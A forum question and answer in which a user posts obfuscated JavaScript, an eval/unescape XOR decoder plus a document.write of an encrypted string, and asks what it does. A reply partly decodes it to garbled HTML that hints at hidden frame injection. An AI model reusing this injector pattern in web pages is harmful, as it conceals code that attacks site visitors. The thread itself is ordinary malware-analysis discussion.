Home/ Questions/Q 6092693
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-23T12:28:23+00:00

I have encountered some java script code which I believe is malicious but most

  • 0

I have encountered some java script code which I believe is malicious but most of it is obfuscated. I was wondering if someone could help me figure out what this code actually does.

eval(unescape('function n48ec61ae(s) {
    var r = "";
    var tmp = s.split("12113781");
    s = unescape(tmp[0]);
    k = unescape(tmp[1] + "608421");
    for( var i = 0; i < s.length; i++) {
        r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-4);
    }
    return r;
}
'));
eval(unescape('document.write(n48ec61ae('') + 'GoqwpF@dmgiEFxipviJBkSbzbjxy,_WMD1yj{yoBFqa|g%ufxoA"go}swtip%-asvporpE$'EF3hachJAmulwisa~$^WYVF%<24-8(&,BQWOJ_G&0."J^ASHAP_NIRI 4. HWBR@QTAOKRCE$5!A@n~cqa PDVJH xw| $_RE@!oq~t:;5{s0ram`axsau2ows2ulaoizm6<21wnkdpicp5hx6vms@q042enA1?7+5=0oI $ZWTHPNWOBFj~ash#QLWIE.nsyaos5kl~& _PGI"ggtzq8ftmto. SDQHDT[I@^LI"6'#RLPKIZJIEONYF%= $SOPSXTOSLB/TS",LVMUKGTUAOVE.2&,VQWNTDXIF@;ntdvj~oxFHtsbrgpntKF3v{lvmukvEF3hpwpJ121137817396048' + unescape(''));'));
// -->

Just as a reminder DO NOT EXECUTE THIS CODE.

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    Silly rabbit… tricks are for virtual machine images which you were planning on discarding anyway…

    I’ve spent a good deal of time on this and I think I can confirm that this is so obfuscated that it can’t do anything anymore.

    You’ll get this:

    <html>D`i]eI>vdsq\H>kW^v`fly*ZLJI3ujouk@BuazbrkzkA&ckwo{lgm*dqrpcnl? +=@.k^fjFAaqhmewax!UPLLB0.0'4*?RPBH[?*,* FRAMEBORDER=0$<O<OCNYCKKV?A1%A>ku\tcPHRFJlozXW?<!cmzn6/-un3mdg\alo]o.com/nkdeeza280-{feasffr1hl2rgoDq.11bcC-7;'17,cI!YPYJLF[K><frame NAME="jo{]cs3fgy+"[PKE]cxzo5]s`nk&$O@SDHLUDCYAK.+NFL?ITGJBBDU>)9OCPMUOHVF>'XO&HZESF<SXCKNI*.(ZQQKOCMKB@/jp^r^viu=Gyq^rkljnGJ3pvgq`ognIB/jl{pD

    The problem is that another function is needed to unscramble this. Notice how it has <html> as well as FRAMEBORDER=, and <frame? That means that there is something which is able to break this up into chunks and reassemble it. The fact that there are so much noise also suggests that there is a function which further decrypts this beyond the scope of n48ec61ae.

    • 0